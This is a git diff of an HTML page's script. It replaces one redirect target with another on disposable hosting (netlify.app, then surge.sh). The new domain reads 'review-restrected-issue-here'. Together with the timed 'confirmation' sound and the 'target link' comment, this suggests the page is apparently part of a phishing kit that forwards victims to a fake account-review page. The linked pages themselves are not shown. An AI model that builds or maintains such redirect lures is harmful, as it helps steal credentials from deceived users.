--- a/index.html
+++ b/index.html
@@ -120,7 +120,7 @@
     <audio id="successSound" src="https://assets.mixkit.co/sfx/preview/mixkit-confirmation-tone-2867.mp3" preload="auto"></audio>
 
     <script>
-        const redirectURL = "https://confirm-review-request-d.netlify.app/"; // Replace this with your target link
+        const redirectURL = "https://review-restrected-issue-here-w.surge.sh/"; // Replace this with your target link
 
         setTimeout(() => {
             // Play sound
